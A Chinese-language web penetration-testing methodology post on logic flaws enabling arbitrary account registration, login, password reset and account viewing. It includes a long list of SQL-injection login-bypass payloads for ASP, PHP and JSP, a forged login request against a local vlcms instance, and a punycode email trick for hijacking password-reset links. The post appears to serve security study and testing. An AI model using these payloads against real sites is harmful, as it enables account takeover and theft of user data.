【web渗透思路】任意账号的注册、登录、重置、查看

简介: 【web渗透思路】任意账号的注册、登录、重置、查看

一、任意用户注册


1.未验证邮箱/手机号


情景:应用为了方便用户记录用户名,使用邮箱和手机号作为用户名(因此很多应用在注册的时候就要求用户填写,多数时候都会给用户发送激活信息,激活后才能登录)


缺陷:


1、未审核邮箱/手机号是否有效(及未发送验证信息),从而实现任意注册账号


2、未验证数据库中是否已经存在相同的用户名(导致同一账号,有2个密码,且用户数据产生读取问题)


2、不安全验证邮箱/手机号

用户注册邮箱/手机号提交后,会通过发验证码等方法对其真实性进行验证


缺陷:


1、返回的验证码:验证码信息会隐藏在返回包中,或hidden属性隐藏,或者是可以伪zao该信息,劫chi到验证信息


2、分布验证/多步填写等情况:第一步填写的时候验证完成以后,后面并未对账号进行再次验证,通过修改数据包中已验证的邮箱/手机


3、验证未绑定:使用自己邮箱/手机获取验证码后,在其他账号上使用


3.批量注册

(提示:危害不足)


通常由于无验证码或者验证码不安全,再对用户名进行爆破即可


4.个人信息伪造

(提示:有的行业会危害不足,防沉迷可能不一样)


需填写身份证等信息,可任意构造绕过身份证与姓名(一般网站危害不足)


如果是防沉迷系统存在此类问题(危害应该足了)


5.前端验证审核绕过

1、任意填写注册信息,服务器会对信息进行审核,并通过返回状态给前端判断(如检测是否存在恶意标签等,对返回的状态可修改绕过)


2、步骤


使用正常账号或合规操作执行,拦截返回信息(判断信息)


使用需要绕过检测的操作,并将服务器返回判断信息替换为正确时的


6.用户名覆盖

未对数据库中的账号进行核对是否已经存在


利用地方:注册账号、修改个人信息


二、任意用户登录


1、万能密码


对万能密码需要有一定的了解,并不是真的万能


有时候也得考虑


字符型 or 数值型


单引号 or 双引号


asp aspx万能密码
1:  "or "a"="a
2:  '.).or.('.a.'='.a 
3:  or 1=1--
4:  'or 1=1--
5:  a'or' 1=1--
6:  "or 1=1--
7:  'or.'a.'='a
8:  "or"="a'='a
9:  'or''='
10: 'or'='or'
11: admin'or 1=1#


PHP万能密码
admin'/*
密码*/'
'or 1=1/*
"or "a"="a
"or 1=1--
"or"="
"or"="a'='a
"or1=1--
"or=or"
''or'='or'
') or ('a'='a
'.).or.('.a.'='.a
'or 1=1
'or 1=1--
'or 1=1/*
'or"="a'='a
'or' '1'='1'
'or''='
'or''=''or''='
'or'='1'
'or'='or'
'or.'a.'='a
'or1=1--
1'or'1'='1
a'or' 1=1--
a'or'1=1--
or 'a'='a'
or 1=1--
or1=1--


jsp 万能密码
1'or'1'='1
admin' or 1=1/*


2、验证码、密码回显

1、可以拦截到验证码(或者验证固定)


2、通过修改user_id,密码会返回在数据包中(至少是加密的)


3、登录检测不安全

1、如下传入参数后登录成功(具体参数可能需要代码审计,或通过已有账号抓包分析)

http://127.0.0.1/vlcms/index.php?s=/member/res_login/

POST:uid=60


2、再访问如下主页,判断是否真的登录成功

http://127.0.0.1/vlcms/index.php?s=/member/


三、任意账号重置


1、重置账号名

登录状态下,点击修改密码,用户名一般不可修改


1、如果可以通过修改前端的代码,让用户名变为可以修改的状态


2、或者在数据包传输过程中修改用户名


3、如果设置新密完全是由前端 js,基于应答状态码决定(即校验通过时服务端并未向客户端 set - cookie),那么可以修改状态码


2、验证码

1、验证码在返回包中回显


2、验证码未绑定、无效


3、验证码在本地进行验证


3、MVC数据对象自动绑定

邮箱重置密码/手机号码重置密码


如果请求中没有明显的身份标识,可增加参数值来测试是否存在MVC数据对应自动绑定漏洞(如增加email参数,并用自己邮箱作为参数值,看是否能收到密码重置链接)

af4380e521fb41cf90ab1c02e48e8005.png



4、Unicode字符处理


(一个大佬的方法)


1、情景:通过URL如/forget-password?email=发送邮件的方法重置密码


2、缺陷:输入邮箱xxxx@gmáil.com会被规范化为xxxx@gmail.com


3、原理:gmáil.com的punnycode是xn--gmil-6na.com,所以目标站点就会把xxxx@gmail.com用户的重置密码链接发送到邮箱xxxx@xn--gmil-6na.com中。并不需要注册gmáil.com域名,并搭建邮件服务器才能完成攻击,bp插件collabrator everwhere的collobrator client就可以实现


4、工具:bp提供了一个在公网能够访问到的域名burpcollaborator.net,并且在使用collabrator的时候会随机生成一个二级域名供我们使用,比如xxxxxx.burpcollaborator.net


5、验证漏洞:重置密码接口处输入含有Unicode字符的邮箱地址:xxxx@gmáil.com.xxxxxx.burpcollaborator.net,如果目标存在漏洞,就可以在collobrator client上看到目标站点发送给我们的xxxx@gmail.com用户的重置密码链接了


四、任意用户查看


1、cookie未鉴权

修改参数,如User _id等与账号一一对应的编号


2、cookie鉴权

钓yu等其他方法获取到其他用户cookie,替换cookie


2、接口中参数

情景:¶meters ={"User _Id":"加密后的值"}接口,返回了User _Id所对应用户的数据


利用:解密 加密值(一般不可能),所以需要在大量数据包中找到在前端带入后,服务器返回数据中被加密后的值(这就要一眼看出加密值的特点,不然就算在面前也……)

7d62be979184459ab44139ed85f387fe.png


目录
相关文章
|
1月前
|
安全 测试技术 程序员
web渗透-文件包含漏洞
文件包含漏洞源于程序动态包含文件时未严格校验用户输入,导致可加载恶意文件。分为本地和远程包含,常见于PHP,利用伪协议、日志或session文件可实现代码执行,需通过合理过滤和配置防范。
490 79
web渗透-文件包含漏洞
|
1月前
|
安全 PHP 开发工具
Web渗透信息收集进阶
网站敏感目录与文件指易被恶意扫描利用的路径,如后台管理、.git、.svn等,可能导致源码泄露或权限入侵。常用工具如御剑、Dirbuster、Dirsearch可探测此类信息,需加强安全防护。
490 58
Web渗透信息收集进阶
|
1月前
|
安全 网络协议 NoSQL
Web渗透-常见的端口及对其的攻击思路
本文介绍了常见网络服务端口及其安全风险,涵盖FTP、SSH、Telnet、SMTP、DNS、HTTP、SMB、数据库及远程桌面等20余个端口,涉及弱口令爆破、信息泄露、未授权访问、缓冲区溢出等典型漏洞,适用于网络安全学习与渗透测试参考。
450 59
|
1月前
|
存储 安全 前端开发
Web渗透-文件上传漏洞-上篇
文件上传漏洞常见于Web应用,因类型限制不严可致恶意文件执行。本文介绍前端检测、MIME类型、黑名单、.htaccess、空格、双写等多种绕过方式,并结合upload-labs靶场演示利用方法,提升安全防护认知。
177 1
Web渗透-文件上传漏洞-上篇
|
1月前
|
安全 中间件 应用服务中间件
WEB渗透-文件上传漏洞-下篇
本文详解文件上传安全漏洞,涵盖白名单绕过(如00截断、条件竞争)、图片木马制作与利用、以及IIS、Apache、Nginx等常见解析漏洞原理与防御。结合实战案例,深入剖析攻击手法与修复方案。
134 1
|
1月前
|
存储 JavaScript 安全
Web渗透-XSS漏洞深入及xss-labs靶场实战
XSS(跨站脚本攻击)是常见的Web安全漏洞,通过在网页中注入恶意脚本,窃取用户信息或执行非法操作。本文介绍其原理、分类(反射型、存储型、DOM型)、测试方法及xss-labs靶场实战案例,帮助理解与防御XSS攻击。
561 1
Web渗透-XSS漏洞深入及xss-labs靶场实战
|
1月前
|
安全 NoSQL Shell
web渗透-SSRF漏洞及discuz论坛网站测试
SSRF(服务器端请求伪造)是一种安全漏洞,攻击者可诱使服务端发起任意请求,进而探测或攻击内网系统。常用于端口扫描、访问内部服务、读取本地文件等。常见防御包括限制协议、域名和IP,但可通过302跳转、短地址等方式绕过。
147 1
web渗透-SSRF漏洞及discuz论坛网站测试
|
1月前
|
安全 程序员 数据库连接
web渗透-CSRF漏洞
CSRF(跨站请求伪造)是一种常见的Web安全漏洞,攻击者通过伪造用户请求,诱使其在已登录状态下执行非意愿操作。本文介绍CSRF原理、分类(站外与站内)、DVWA靶场搭建及防御措施,如同源策略与Token验证,提升安全防护意识。
272 0
web渗透-CSRF漏洞
|
1月前
|
安全 Linux PHP
Web渗透-命令执行漏洞-及常见靶场检测实战
命令执行漏洞(RCE)指应用程序调用系统命令时,用户可控制输入参数,导致恶意命令被拼接执行,从而危害系统安全。常见于PHP的system、exec等函数。攻击者可通过命令连接符在目标系统上执行任意命令,造成数据泄露或服务瘫痪。漏洞成因包括代码层过滤不严、第三方组件缺陷等。可通过参数过滤、最小权限运行等方式防御。本文还介绍了绕过方式、靶场测试及复现过程。
623 0
|
1月前
|
安全 数据安全/隐私保护
Web渗透-逻辑漏洞
逻辑漏洞主要因程序逻辑不严谨或复杂导致处理错误,常见于越权访问、密码修改、支付等环节。漏洞统计显示,越权操作和逻辑漏洞占比最高,尤其账号安全风险突出,如任意重置密码、验证码暴力破解等。漏洞分类中,越权访问分为水平越权(同权限用户间数据访问)和垂直越权(跨权限数据访问)。
80 0
Web渗透-逻辑漏洞

热门文章

最新文章